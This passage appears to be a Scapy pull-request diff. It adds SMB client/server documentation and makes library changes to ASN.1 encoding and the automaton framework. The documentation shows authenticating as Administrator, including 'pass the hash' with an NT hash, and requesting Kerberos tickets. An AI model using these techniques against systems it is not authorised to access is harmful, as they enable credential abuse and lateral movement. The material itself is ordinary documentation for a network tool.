FileAttributes EndOfFile LastWriteTime + . DIRECTORY 0B Fri, 24 Feb 2023 17:00:27 (1677254427) + .. DIRECTORY 0B Fri, 24 Feb 2023 17:00:27 (1677254427) + EdgeUpdater DIRECTORY 0B Fri, 24 Feb 2023 17:00:27 (1677254427) + +.. note:: You can use ``help`` or ``?`` in the CLI to get the list of available commands. + +As you can see, the previous example used Kerberos to authenticate. +By default, the :class:`~scapy.layers.smbclient.smbclient` class will use a :class:`~scapy.layers.spnego.SPNEGOSSP` and provide ask for both ``NTLM`` and ``Kerberos``. but it is possible to have a greater control over this by providing your own ``ssp`` attribute. + +**smbclient using a** :class:`~scapy.layers.ntlm.NTLMSSP` + +.. code:: python + + >>> smbclient("server1.domain.local", ssp=NTLMSSP(UPN="Administrator", PASSWORD="password")) + +You might be wondering if you can pass the ``HashNT`` of the password of the user 'Administrator' directly. The answer is yes, you can 'pass the hash' directly: + +.. code:: python + + >>> smbclient("server1.domain.local", ssp=NTLMSSP(UPN="Administrator", HASHNT=bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c"))) + +**smbclient using a** :class:`~scapy.layers.ntlm.KerberosSSP` + +.. code:: python + + >>> smbclient("server1.domain.local", ssp=KerberosSSP(SPN="cifs/server1", UPN="Administrator@domain.local", PASSWORD="password")) + +**smbclient using a** :class:`~scapy.layers.ntlm.KerberosSSP` **created by** `Ticketer++ `_: + +.. code:: python + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@DOMAIN.LOCAL") + Enter password: ********** + >>> t.request_st(0, "host/server1.domain.local") + >>> smbclient("server1.domain.local", ssp=t.ssp(1)) + SMB authentication successful using KerberosSSP ! + +If you pay very close attention, you'll notice that in this case we aren't using the :class:`~scapy.layers.spnego.SPNEGOSSP` wrapper. You could have used ``ssp=SPNEGOSSP([t.ssp(1)])``. + +Programmatically +________________ + +A cool feature of the :class:`~scapy.layers.smbclient.smbclient` is that all commands that you can call from the CLI, you can also call programmatically. + +Let's re-do the initial example programmatically, by turning off the CLI mode. Obviously prompting for passwords will not work so make sure the client has everything it needs for Session Setup. + +.. code:: python + + >>> from scapy.layers.smbclient import smbclient + >>> cli = smbclient("server1.domain.local", "Administrator@domain.local", password="password", cli=False) + >>> shares = cli.shares() + >>> shares + [('ADMIN$', 'DISKTREE', 'Remote Admin'), + ('C$', 'DISKTREE', 'Default share'), + ('common', 'DISKTREE', ''), + ('IPC$', 'IPC', 'Remote IPC'), + ('NETLOGON', 'DISKTREE', 'Logon server share '), + ('SYSVOL', 'DISKTREE', 'Logon server share '), + ('Users', 'DISKTREE', '')] + >>> cli.use('c$') + >>> cli.cd(r'Program Files\Microsoft') + >>> >>> names = [x[0] for x in cli.ls()] + >>> names + ['.', '..', 'EdgeUpdater'] + +Mid-Level :class:`~scapy.layers.smbclient.SMB_SOCKET` +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +If you know what you're doing, then the High-Level smbclient might not be enough for you. You can go a level lower using the :class:`~scapy.layers.smbclient.SMB_SOCKET`. +You can instantiate the object directly or via the :meth:`~scapy.layers.smbclient.SMB_SOCKET.from_tcpsock` helper. + +Let's write a script that connects to a share and list the files in the root folder. + +.. code:: python + + import socket + from scapy.layers.smbclient import SMB_SOCKET + from scapy.layers.spnego import SPNEGOSSP + from scapy.layers.ntlm import NTLMSSP, MD4le + from scapy.layers.kerberos import KerberosSSP + # Build SSP first. In SMB_SOCKET you have to do this yourself + password = "password" + ssp = SPNEGOSSP([ + NTLMSSP(UPN="Administrator", PASSWORD=password), + KerberosSSP( + UPN="Administrator@domain.local", + PASSWORD=password, + SPN="cifs/server1", + ) + ]) + # Connect to the server + sock = socket.socket() + sock.connect(("server1.domain.local", 445)) + smbsock = SMB_SOCKET.from_tcpsock(sock, ssp=ssp) + # Tree connect + tid = smbsock.tree_connect("C$") + smbsock.set_TID(tid) + # Open root folder and query files at root + fileid = smbsock.create_request('', type='folder') + files = smbsock.query_directory(fileid) + names = [x[0] for x in files] + # Close the handle + smbsock.close_request(fileid) + # Close the socket + smbsock.close() + +This has a lot more overhead so make sure you need it. + +Something hybrid that might be easier to use, is to access the underlying :class:`~scapy.layers.smbclient.SMB_SOCKET` in a higher-level :class:`~scapy.layers.smbclient.smbclient`: + +.. code:: python + + >>> from scapy.layers.smbclient import smbclient + >>> cli = smbclient("server1.domain.local", "Administrator@domain.local", password="password", cli=False) + >>> cli.use('c$') + >>> smbsock = cli.smbsock + >>> # Open root folder and query files at root + >>> fileid = smbsock.create_request('', type='folder') + >>> files = smbsock.query_directory(fileid) + >>> names = [x[0] for x in files] + +Low-Level :class:`~scapy.layers.smbclient.SMB_Client` +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Finally, it's also possible to call the underlying :attr:`~scapy.layers.smbclient.SMB_Client.smblink` socket directly. +Again, you can instantiate the object directly or via the :meth:`~scapy.layers.smbclient.SMB_Client.from_tcpsock` helper. + +.. code:: python + + >>> import socket + >>> from scapy.layers.smbclient import SMB_Client + >>> sock = socket.socket() + >>> sock.connect(("192.168.0.100", 445)) + >>> lowsmbsock = SMB_Client.from_tcpsock(sock, ssp=NTLMSSP(UPN="Administrator", PASSWORD="password")) + >>> resp = cli.sock.sr1(SMB2_Tree_Connect_Request(Path=r"\\server1\c$")) + +It's also accessible as the ``ins`` attribute of a ``SMB_SOCKET``, or the ``sock`` attribute of a ``smbclient``. + +.. code:: python + + >>> from scapy.layers.smbclient import smbclient + >>> cli = smbclient("server1.domain.local", "Administrator@domain.local", password="password", cli=False) + >>> lowsmbsock = cli.sock + >>> resp = cli.sock.sr1(SMB2_Tree_Connect_Request(Path=r"\\server1\c$")) + +SMB 2/3 server +-------------- + +Scapy provides a SMB 2/3 server Automaton: :class:`~scapy.layers.smbclient.SMB_Server` + +.. image:: ../graphics/smb/smb_server.png + :align: center + +Once again, Scapy provides high level :class:`~scapy.layers.smbclient.smbserver` class that allows to spawn a SMB server. + +High-Level :class:`~scapy.layers.smbclient.smbserver` +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +The :class:`~scapy.layers.smbclient.smbserver` class allows to spawn a SMB server serving a selection of shares. +A share is identified by a ``name`` and a ``path`` (+ an optional description called ``remark``). + +**Start a SMB server with NTLM auth for 2 users:** + +.. code:: python + + smbserver( + shares=[SMBShare(name="Scapy", path="/tmp")], + iface="eth0", + ssp=NTLMSSP( + IDENTITIES={ + "User1": MD4le("Password1"), + "Administrator": MD4le("Password2"), + }, + ) + ) + +**Start a SMB server with Kerberos auth:** + +.. code:: python + + smbserver( + shares=[SMBShare(name="Scapy", path="/tmp")], + iface="eth0", + ssp=KerberosSSP( + KEY=Key( + EncryptionType.AES256_CTS_HMAC_SHA1_96, + key=bytes.fromhex("0000000000000000000000000000000000000000000000000000000000000000"), + ), + SPN="cifs/server.domain.local", + ), + ) + +**You can of course combine a NTLM and Kerberos server and provide them both over a** :class:`~scapy.layers.spnego.SPNEGOSSP`: + +.. code:: python + + smbserver( + shares=[SMBShare(name="Scapy", path="/tmp")], + iface="eth0", + ssp=SPNEGOSSP( + [ + KerberosSSP( + KEY=Key( + EncryptionType.AES256_CTS_HMAC_SHA1_96, + key=bytes.fromhex("0000000000000000000000000000000000000000000000000000000000000000"), + ), + SPN="cifs/server.domain.local", + ), + NTLMSSP( + IDENTITIES={ + "User1": MD4le("Password1"), + "Administrator": MD4le("Password2"), + }, + ), + ] + ), + ) + +Low-Level :class:`~scapy.layers.smbclient.SMB_Server` +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +To change the functionality of the :class:`~scapy.layers.smbclient.SMB_Server`, you shall extend the server class (which is an automaton) and provide additional custom conditions (or overwrite existing ones). + +.. code:: python + + from scapy.layers.smbserver import SMB_Server + class MyCustomSMBServer(SMB_Server): + """ + Ridiculous demo SMB Server + + We overwrite the handler of "SMB Echo Request" to do some crazy stuff + """ + @ATMT.action(SMB_Server.receive_echo_request) + def send_echo_reply(self, pkt): + super(MyCustomSMBServer, self).send_echo_reply(pkt) # send echo response + print("WHAT? An ECHO REQUEST? You MUUUSST be a linux user then, since Windows NEEEVER sends those !") diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index c32e2420b52..c98836aa0d7 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -771,7 +771,8 @@ Available by default: - :py:class:`~scapy.sessions.TCPSession` -> *defragment certain TCP protocols*. Currently supports: - HTTP 1.0 - TLS - - Kerberos / DCERPC + - Kerberos + - DCE/RPC - :py:class:`~scapy.sessions.TLSSession` -> *matches TLS sessions* on the flow. - :py:class:`~scapy.sessions.NetflowSession` -> *resolve Netflow V9 packets* from their NetflowFlowset information objects @@ -786,6 +787,10 @@ Those sessions can be used using the ``session=`` parameter of ``sniff()``. Exam Your custom ``Session`` class only needs to extend the :py:class:`~scapy.sessions.DefaultSession` class, and implement a ``process`` or a ``recv`` function, such as in the examples. +.. warning:: + The inner workings of ``Session`` is currently UNSTABLE: custom Sessions may break in the future. + + How to use TCPSession to defragment TCP packets ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ diff --git a/scapy/__init__.py b/scapy/__init__.py index 9ead5b81c04..eeb937cc9ca 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -15,6 +15,11 @@ import re import subprocess +__all__ = [ + "VERSION", + "__version__", +] + _SCAPY_PKG_DIR = os.path.dirname(__file__) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index e821df54014..8b206f4335d 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -243,6 +243,10 @@ def sniff(self): # type: () -> None from scapy.supersocket import StreamSocket ssock = socket.socket(socket.AF_INET, self.TYPE) + try: + ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + except OSError: + pass ssock.bind( (get_if_addr(self.optsniff.get("iface", conf.iface)), self.port)) ssock.listen() diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index ecfeda2359f..16eab8ecec7 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -21,7 +21,7 @@ IPV6_ADDR_GLOBAL ) from scapy.error import log_loading, Scapy_Exception -from scapy.interfaces import NetworkInterface, network_name +from scapy.interfaces import _GlobInterfaceType, network_name from scapy.pton_ntop import inet_pton, inet_ntop from scapy.libs.extcap import load_extcap @@ -32,8 +32,12 @@ Optional, Tuple, Union, + TYPE_CHECKING, ) +if TYPE_CHECKING: + from scapy.interfaces import NetworkInterface + # Note: the typing of this file is heavily ignored because MyPy doesn't allow # to import the same function from different files. @@ -72,7 +76,7 @@ def str2mac(s): def get_if_addr(iff): - # type: (str) -> str + # type: (_GlobInterfaceType) -> str """ Returns the IPv4 of an interface or "0.0.0.0" if not available """ @@ -80,7 +84,7 @@ def get_if_addr(iff): def get_if_hwaddr(iff): - # type: (Union[NetworkInterface, str]) -> str + # type: (_GlobInterfaceType) -> str """ Returns the MAC (hardware) address of an interface """ @@ -93,7 +97,7 @@ def get_if_hwaddr(iff): def get_if_addr6(niff): - # type: (NetworkInterface) -> Optional[str] + # type: (_GlobInterfaceType) -> Optional[str] """ Returns the main global unicast address associated with provided interface, in human readable form. If no global address is found, @@ -105,7 +109,7 @@ def get_if_addr6(niff): def get_if_raw_addr6(iff): - # type: (NetworkInterface) -> Optional[bytes] + # type: (_GlobInterfaceType) -> Optional[bytes] """ Returns the main global unicast address associated with provided interface, in network format. If no global address is found, None @@ -158,10 +162,10 @@ def get_if_raw_addr6(iff): SIOCGIFHWADDR = 0 # mypy compat # DUMMYS - def get_if_raw_addr(iff: Union[NetworkInterface, str]) -> bytes: + def get_if_raw_addr(iff: Union['NetworkInterface', str]) -> bytes: return b"\0\0\0\0" - def get_if_raw_hwaddr(iff: Union[NetworkInterface, str]) -> Tuple[int, bytes]: + def get_if_raw_hwaddr(iff: Union['NetworkInterface', str]) -> Tuple[int, bytes]: return -1, b"" def in6_getifaddr() -> List[Tuple[str, int, str]]: diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index ee25b16334c..5183c64e76e 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -136,6 +136,8 @@ def close(self): # PCAP # ########## +if WINDOWS: + NPCAP_PATH = "" if conf.use_pcap: if WINDOWS: @@ -265,8 +267,6 @@ def load_winpcapy(): conf.use_npcap = True conf.loopback_name = conf.loopback_name = "Npcap Loopback Adapter" # noqa: E501 -if WINDOWS: - NPCAP_PATH = "" if conf.use_pcap: class _PcapWrapper_libpcap: # noqa: F811 """Wrapper for the libpcap calls""" diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 478ff969c9d..658cabb710d 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -486,6 +486,15 @@ def __setattr__(self, name, value): else: object.__setattr__(self, name, value) + def set(self, i, val): + # type: (int, str) -> None + """ + Sets bit 'i' to value 'val' (starting from 0) + """ + val = str(val) + assert val in ['0', '1'] + self.val = self.val[:i] + val + self.val[i + 1:] + def __repr__(self): # type: () -> str s = self.val_readable diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 58502a224aa..413ce1c96e5 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -104,7 +104,10 @@ class BER_BadTag_Decoding_Error(BER_Decoding_Error, def BER_len_enc(ll, size=0): - # type: (int, int) -> bytes + # type: (int, Optional[int]) -> bytes + from scapy.config import conf + if size is None: + size = conf.ASN1_default_long_size if ll <= 127 and size == 0: return chb(ll) s = b"" @@ -387,13 +390,13 @@ def safedec(cls, return cls.dec(s, context, safe=True) @classmethod - def enc(cls, s): - # type: (_K) -> bytes + def enc(cls, s, size_len=0): + # type: (_K, Optional[int]) -> bytes if isinstance(s, (str, bytes)): - return BERcodec_STRING.enc(s) + return BERcodec_STRING.enc(s, size_len=size_len) else: try: - return BERcodec_INTEGER.enc(int(s)) # type: ignore + return BERcodec_INTEGER.enc(int(s), size_len=size_len) # type: ignore except TypeError: raise TypeError("Trying to encode an invalid value !") @@ -409,8 +412,8 @@ class BERcodec_INTEGER(BERcodec_Object[int]): tag = ASN1_Class_UNIVERSAL.INTEGER @classmethod - def enc(cls, i): - # type: (int) -> bytes + def enc(cls, i, size_len=0): + # type: (int, Optional[int]) -> bytes ls = [] while True: ls.append(i & 0xff) @@ -422,7 +425,7 @@ def enc(cls, i): if not i: break s = [chb(hash(c)) for c in ls] - s.append(BER_len_enc(len(s))) + s.append(BER_len_enc(len(s), size=size_len)) s.append(chb(hash(cls.tag))) s.reverse() return b"".join(s) @@ -480,8 +483,8 @@ def do_dec(cls, ) @classmethod - def enc(cls, _s): - # type: (AnyStr) -> bytes + def enc(cls, _s, size_len=0): + # type: (AnyStr, Optional[int]) -> bytes # /!\ this is DER encoding (bit strings are only zero-bit padded) s = bytes_encode(_s) if len(s) % 8 == 0: @@ -492,18 +495,18 @@ def enc(cls, _s): s = b"".join(chb(int(b"".join(chb(y) for y in x), 2)) for x in zip(*[iter(s)] * 8)) s = chb(unused_bits) + s - return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s + return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s class BERcodec_STRING(BERcodec_Object[str]): tag = ASN1_Class_UNIVERSAL.STRING @classmethod - def enc(cls, _s): - # type: (Union[str, bytes]) -> bytes + def enc(cls, _s, size_len=0): + # type: (Union[str, bytes], Optional[int]) -> bytes s = bytes_encode(_s) # Be sure we are encoding bytes - return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s + return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s @classmethod def do_dec(cls, @@ -520,20 +523,20 @@ class BERcodec_NULL(BERcodec_INTEGER): tag = ASN1_Class_UNIVERSAL.NULL @classmethod - def enc(cls, i): - # type: (int) -> bytes + def enc(cls, i, size_len=0): + # type: (int, Optional[int]) -> bytes if i == 0: return chb(hash(cls.tag)) + b"\0" else: - return super(cls, cls).enc(i) + return super(cls, cls).enc(i, size_len=size_len) class BERcodec_OID(BERcodec_Object[bytes]): tag = ASN1_Class_UNIVERSAL.OID @classmethod - def enc(cls, _oid): - # type: (AnyStr) -> bytes + def enc(cls, _oid, size_len=0): + # type: (AnyStr, Optional[int]) -> bytes oid = bytes_encode(_oid) if oid: lst = [int(x) for x in oid.strip(b".").split(b".")] @@ -543,7 +546,7 @@ def enc(cls, _oid): lst[1] += 40 * lst[0] del lst[0] s = b"".join(BER_num_enc(k) for k in lst) - return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s + return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s @classmethod def do_dec(cls, @@ -622,13 +625,13 @@ class BERcodec_SEQUENCE(BERcodec_Object[Union[bytes, List[BERcodec_Object[Any]]] tag = ASN1_Class_UNIVERSAL.SEQUENCE @classmethod - def enc(cls, _ll): - # type: (Union[bytes, List[BERcodec_Object[Any]]]) -> bytes + def enc(cls, _ll, size_len=0): + # type: (Union[bytes, List[BERcodec_Object[Any]]], Optional[int]) -> bytes if isinstance(_ll, bytes): ll = _ll else: ll = b"".join(x.enc(cls.codec) for x in _ll) - return chb(hash(cls.tag)) + BER_len_enc(len(ll)) + ll + return chb(hash(cls.tag)) + BER_len_enc(len(ll), size=size_len) + ll @classmethod def do_dec(cls, @@ -669,13 +672,13 @@ class BERcodec_IPADDRESS(BERcodec_STRING): tag = ASN1_Class_UNIVERSAL.IPADDRESS @classmethod - def enc(cls, ipaddr_ascii): # type: ignore - # type: (str) -> bytes + def enc(cls, ipaddr_ascii, size_len=0): # type: ignore + # type: (str, Optional[int]) -> bytes try: s = inet_aton(ipaddr_ascii) except Exception: raise BER_Encoding_Error("IPv4 address could not be encoded") - return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s + return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s @classmethod def do_dec(cls, s, context=None, safe=False): diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 06d5d01be27..57ec5de111d 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -612,11 +612,13 @@ def load_mib(filenames): '2.16.840.1.114414.1.7.24.3': 'EV Starfield Service Certificate Authority' } -# +# gssapi # gssapi_oids = { '1.2.840.48018.1.2.2': 'MS KRB5 - Microsoft Kerberos 5', '1.2.840.113554.1.2.2': 'Kerberos 5', + '1.2.840.113554.1.2.2.3': 'Kerberos 5 - User to User', + '1.3.6.1.5.2.5': 'Kerberos 5 - IAKERB', '1.3.6.1.5.5.2': 'SPNEGO - Simple Protected Negotiation', '1.3.6.1.4.1.311.2.2.10': 'NTLMSSP - Microsoft NTLM Security Support Provider', '1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism', diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 0555204513c..84e454e459f 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -8,6 +8,8 @@ Classes that implement ASN.1 data structures. """ +import copy + from functools import reduce from scapy.asn1.asn1 import ( @@ -91,6 +93,7 @@ def __init__(self, implicit_tag=None, # type: Optional[int] explicit_tag=None, # type: Optional[int] flexible_tag=False, # type: Optional[bool] + size_len=None, # type: Optional[int] ): # type: (...) -> None if context is not None: @@ -102,6 +105,7 @@ def __init__(self, self.default = default # type: ignore else: self.default = self.ASN1_tag.asn1_object(default) # type: ignore + self.size_len = size_len self.flexible_tag = flexible_tag if (implicit_tag is not None) and (explicit_tag is not None): err_msg = "field cannot be both implicitly and explicitly tagged" @@ -168,7 +172,7 @@ def i2m(self, pkt, x): else: raise ASN1_Error("Encoding Error: got %r instead of an %r for field [%s]" % (x, self.ASN1_tag, self.name)) # noqa: E501 else: - s = self.ASN1_tag.get_codec(pkt.ASN1_codec).enc(x) + s = self.ASN1_tag.get_codec(pkt.ASN1_codec).enc(x, size_len=self.size_len) return BER_tagging_enc(s, hidden_tag=self.ASN1_tag, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) @@ -237,6 +241,10 @@ def randval(self): # type: () -> RandField[_I] return cast(RandField[_I], RandInt()) + def copy(self): + # type: () -> ASN1F_field[_I, _A] + return copy.copy(self) + ############################ # Simple ASN1 Fields # @@ -435,14 +443,8 @@ def __init__(self, *seq, **kwargs): # type: (*Any, **Any) -> None name = "dummy_seq_name" default = [field.default for field in seq] - for kwarg in ["context", "implicit_tag", - "explicit_tag", "flexible_tag"]: - setattr(self, kwarg, kwargs.get(kwarg)) super(ASN1F_SEQUENCE, self).__init__( - name, default, context=self.context, - implicit_tag=self.implicit_tag, - explicit_tag=self.explicit_tag, - flexible_tag=self.flexible_tag + name, default, **kwargs ) self.seq = seq self.islist = len(seq) > 1 @@ -796,7 +798,7 @@ def __init__(self, name, None, context=context, implicit_tag=implicit_tag, explicit_tag=explicit_tag ) - if implicit_tag is None and explicit_tag is None: + if implicit_tag is None and explicit_tag is None and cls is not None: if cls.ASN1_root.ASN1_tag == ASN1_Class_UNIVERSAL.SEQUENCE: self.network_tag = 16 | 0x20 self.default = default @@ -840,10 +842,22 @@ def i2m(self, s = b"" else: s = raw(x) + if not hasattr(x, "ASN1_root"): + # A normal Packet (!= ASN1) + return s return BER_tagging_enc(s, hidden_tag=self.ASN1_tag, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) + def any2i(self, + pkt, # type: ASN1_Packet + x # type: Union[bytes, ASN1_Packet, None, ASN1_Object[Optional[ASN1_Packet]]] # noqa: E501 + ): + # type: (...) -> 'ASN1_Packet' + if hasattr(x, "add_underlayer"): + x.add_underlayer(pkt) # type: ignore + return super(ASN1F_PACKET, self).any2i(pkt, x) + def randval(self): # type: ignore # type: () -> ASN1_Packet return packet.fuzz(self.cls()) @@ -917,6 +931,18 @@ def __init__(self, explicit_tag=explicit_tag ) + def any2i(self, pkt, x): + # type: (ASN1_Packet, Any) -> str + if isinstance(x, str): + if any(y not in ["0", "1"] for y in x): + # resolve the flags + value = ["0"] * len(self.mapping) + for i in x.split("+"): + value[self.mapping.index(i)] = "1" + x = "".join(value) + x = ASN1_BIT_STRING(x) + return super(ASN1F_FLAGS, self).any2i(pkt, x) + def get_flags(self, pkt): # type: (ASN1_Packet) -> List[str] fbytes = getattr(pkt, self.name).val diff --git a/scapy/automaton.py b/scapy/automaton.py index 63a03ce3f03..f9b4d4ef202 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -2,7 +2,7 @@ # This file is part of Scapy # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter +# Copyright (C) Gabriel Potter """ Automata with states, transitions and actions. @@ -27,13 +27,14 @@ from collections import deque from scapy.config import conf -from scapy.utils import do_graph -from scapy.error import log_runtime, warning -from scapy.plist import PacketList +from scapy.consts import WINDOWS from scapy.data import MTU -from scapy.supersocket import SuperSocket +from scapy.error import log_runtime, warning +from scapy.interfaces import _GlobInterfaceType from scapy.packet import Packet -from scapy.consts import WINDOWS +from scapy.plist import PacketList +from scapy.supersocket import SuperSocket, StreamSocket +from scapy.utils import do_graph # Typing imports from typing import ( @@ -78,7 +79,7 @@ def select_objects(inputs, remain): [b] :param inputs: objects to process - :param remain: timeout. If 0, poll. + :param remain: timeout. If 0, poll. If None, block. """ if not WINDOWS: return select.select(inputs, [], [], remain)[0] @@ -194,11 +195,13 @@ def flush(self): # type: () -> None pass - def recv(self, n=0): - # type: (Optional[int]) -> Optional[_T] + def recv(self, n=0, options=socket.MsgFlag(0)): + # type: (Optional[int], socket.MsgFlag) -> Optional[_T] if self.closed: + raise EOFError + if options & socket.MSG_PEEK: if self.__queue: - return self.__queue.popleft() + return self.__queue[0] return None os.read(self.__rd, 1) elt = self.__queue.popleft() @@ -219,11 +222,11 @@ def clear(self): def close(self): # type: () -> None if not self.closed: + self.closed = True os.close(self.__rd) os.close(self.__wr) if WINDOWS: self._winclose() - self.closed = True def __repr__(self): # type: () -> str @@ -239,7 +242,7 @@ def select(sockets, remain=conf.recv_poll_rate): # Only handle ObjectPipes results = [] for s in sockets: - if s.closed: + if s.closed: # allow read to trigger EOF results.append(s) if results: return results @@ -365,11 +368,11 @@ def expired(self): return lst def until_next(self): - # type: () -> float + # type: () -> Optional[float] try: return min([t._remaining() for t in self.timers if t._running()]) except ValueError: - return 0 + return None # None means blocking def count(self): # type: () -> int @@ -445,6 +448,7 @@ class ATMT: CONDITION = "Condition" RECV = "Receive condition" TIMEOUT = "Timeout condition" + EOF = "EOF condition" IOEVENT = "I/O event" class NewStateRequested(Exception): @@ -578,7 +582,7 @@ def deco(f, state=state, timeout=Timer(timeout)): @staticmethod def timer(state, timeout, prio=0): # type: (_StateWrapper, Union[float, int], int) -> Callable[[_StateWrapper, _StateWrapper, Timer], _StateWrapper] # noqa: E501 - def deco(f, state=state, timeout=Timer(timeout, prio=prio, autoreload=True)): # noqa: E501 + def deco(f, state=state, timeout=Timer(timeout, prio=prio, autoreload=True)): # type: (_StateWrapper, _StateWrapper, Timer) -> _StateWrapper f.atmt_type = ATMT.TIMEOUT f.atmt_state = state.atmt_state @@ -588,6 +592,17 @@ def deco(f, state=state, timeout=Timer(timeout, prio=prio, autoreload=True)): # return f return deco + @staticmethod + def eof(state): + # type: (_StateWrapper) -> Callable[[_StateWrapper, _StateWrapper], _StateWrapper] # noqa: E501 + def deco(f, state=state): + # type: (_StateWrapper, _StateWrapper) -> _StateWrapper + f.atmt_type = ATMT.EOF + f.atmt_state = state.atmt_state + f.atmt_condname = f.__name__ + return f + return deco + class _ATMT_Command: RUN = "RUN" @@ -619,17 +634,16 @@ def __init__(self, self.ioevent = ioevent self.proto = proto # write, read - self.spa, self.spb = ObjectPipe[bytes]("spa"), \ - ObjectPipe[bytes]("spb") + self.spa, self.spb = ObjectPipe[Any]("spa"), \ + ObjectPipe[Any]("spb") kargs["external_fd"] = {ioevent: (self.spa, self.spb)} kargs["is_atmt_socket"] = True + kargs["atmt_socket"] = self.name self.atmt = automaton(*args, **kargs) self.atmt.runbg() def send(self, s): - # type: (Union[bytes, Packet]) -> int - if not isinstance(s, bytes): - s = bytes(s) + # type: (Any) -> int return self.spa.send(s) def fileno(self): @@ -686,9 +700,10 @@ def __new__(cls, name, bases, dct): cls.conditions = {} # type: Dict[str, List[_StateWrapper]] cls.ioevents = {} # type: Dict[str, List[_StateWrapper]] cls.timeout = {} # type: Dict[str, _TimerList] + cls.eofs = {} # type: Dict[str, _StateWrapper] cls.actions = {} # type: Dict[str, List[_StateWrapper]] cls.initial_states = [] # type: List[_StateWrapper] - cls.stop_states = [] # type: List[_StateWrapper] + cls.stop_state = None # type: Optional[_StateWrapper] cls.ionames = [] cls.iosupersockets = [] @@ -715,8 +730,10 @@ def __new__(cls, name, bases, dct): if m.atmt_initial: cls.initial_states.append(m) if m.atmt_stop: - cls.stop_states.append(m) - elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT]: # noqa: E501 + if cls.stop_state is not None: + raise ValueError("There can only be a single stop state !") + cls.stop_state = m + elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT, ATMT.EOF]: # noqa: E501 cls.actions[m.atmt_condname] = [] for m in decorated: @@ -724,6 +741,8 @@ def __new__(cls, name, bases, dct): cls.conditions[m.atmt_state].append(m) elif m.atmt_type == ATMT.RECV: cls.recv_conditions[m.atmt_state].append(m) + elif m.atmt_type == ATMT.EOF: + cls.eofs[m.atmt_state] = m elif m.atmt_type == ATMT.IOEVENT: cls.ioevents[m.atmt_state].append(m) cls.ionames.append(m.atmt_ioname) @@ -791,9 +810,12 @@ def build_graph(self): names.extend(self.__dict__[n].__code__.co_names) names.extend(self.__dict__[n].__code__.co_consts) - for c, k, v in ([("purple", k, v) for k, v in self.conditions.items()] + # noqa: E501 - [("red", k, v) for k, v in self.recv_conditions.items()] + # noqa: E501 - [("orange", k, v) for k, v in self.ioevents.items()]): + for c, sty, k, v in ( + [("purple", "solid", k, v) for k, v in self.conditions.items()] + + [("red", "solid", k, v) for k, v in self.recv_conditions.items()] + + [("orange", "solid", k, v) for k, v in self.ioevents.items()] + + [("black", "dashed", k, [v]) for k, v in self.eofs.items()] + ): for f in v: names = list(f.__code__.co_names + f.__code__.co_consts) while names: @@ -802,10 +824,16 @@ def build_graph(self): line = f.atmt_condname for x in self.actions[f.atmt_condname]: line += "\\l>[%s]" % x.__name__ - s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501 + s += '\t"%s" -> "%s" [label="%s", color=%s, style=%s];\n' % ( + k, + n, + line, + c, + sty, + ) elif n in self.__dict__: # function indirection - if callable(self.__dict__[n]): + if callable(self.__dict__[n]) and hasattr(self.__dict__[n], "__code__"): # noqa: E501 names.extend(self.__dict__[n].__code__.co_names) names.extend(self.__dict__[n].__code__.co_consts) for k, timers in self.timeout.items(): @@ -832,21 +860,35 @@ class Automaton(metaclass=Automaton_metaclass): state = None # type: ATMT.NewStateRequested recv_conditions = {} # type: Dict[str, List[_StateWrapper]] conditions = {} # type: Dict[str, List[_StateWrapper]] + eofs = {} # type: Dict[str, _StateWrapper] ioevents = {} # type: Dict[str, List[_StateWrapper]] timeout = {} # type: Dict[str, _TimerList] actions = {} # type: Dict[str, List[_StateWrapper]] initial_states = [] # type: List[_StateWrapper] - stop_states = [] # type: List[_StateWrapper] + stop_state = None # type: Optional[_StateWrapper] ionames = [] # type: 